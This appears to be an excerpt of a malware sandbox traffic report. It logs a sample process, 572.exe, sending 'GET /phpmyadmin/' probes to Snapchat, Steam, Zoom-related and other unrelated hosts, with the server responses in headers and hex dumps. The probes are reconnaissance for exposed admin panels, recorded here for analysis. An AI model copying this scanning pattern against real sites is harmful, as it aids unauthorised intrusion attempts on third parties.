                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 34 66 36 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4f66<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 6c 75 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 70 70 2f 6d 61 72 6b 65 74 5f 6f 6e 65 74 72 75 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 47 66 6f 58 38 55 30 54 2d 71 4d 74 52 49 71 61 56 6e 4e 69 51 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 32 37 64 38 65 35 37 65 66 63 34 39 34 34 61 30 61 36 37 34 31 30 31 39 37 34 36 66 31 64 35 62 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pp/market_onetrust_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="xGfoX8U0T-qMtRIqaVnNiQ">window.zmGlobalMrktId = "27d8e57efc4944a0a6741019746f1d5b" || null;window.zmGlobalMrktKey = "" || null;window['optimizel
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 33 36 32 30 30 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 47 66 6f 58 38 55 30 54 2d 71 4d 74 52 49 71 61 56 6e 4e 69 51 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 78 47 66 6f 58 38 55 30 54 2d 71 4d 74 52 49 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 36200;}.expired-cc-banner .zm-icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="xGfoX8U0T-qMtRIqaVnNiQ" src="/csrf_js"></script><script nonce="xGfoX8U0T-qMtRIq
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 4d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: M = document.getElementById('ot-cookie-pref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',')
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 64 6b 2d 73 68 6f 77 2d 73 65 74 74 69 6e 67 73 20 7b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dk-show-settings {padding-left: 10px;border-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translate
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 68 42 75 74 74 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hButton" aria-expanded="false" aria-controls="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><pat


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                25192.168.2.65459034.149.46.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5747INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=a144e177-09e4-4e33-ab14-8346afc4f347; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: f7ffe492a986e11219fcca0962e31146
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                26192.168.2.650943184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC233INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                27192.168.2.654710138.197.59.199443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=A0iUBDz0ojlIC0qq9RPBz7uw.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                28192.168.2.654856104.21.60.188443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC962INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                                                                                Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymous
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: xf_csrf=_NnNhXcjjnO-7A8g; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=awDfpweHRTLh2Do5qoCWylFboJgpuiEUMRdEESw4U9a3jCYb6lP6bXKHJ5dcPzxFz4Ezi8gAA4L1KNljSf%2F3BFhIdIDSqENAlN1QBUpXwVb7WurDcZ5A%2BsfRVps5wg0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6ef93c7bae-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
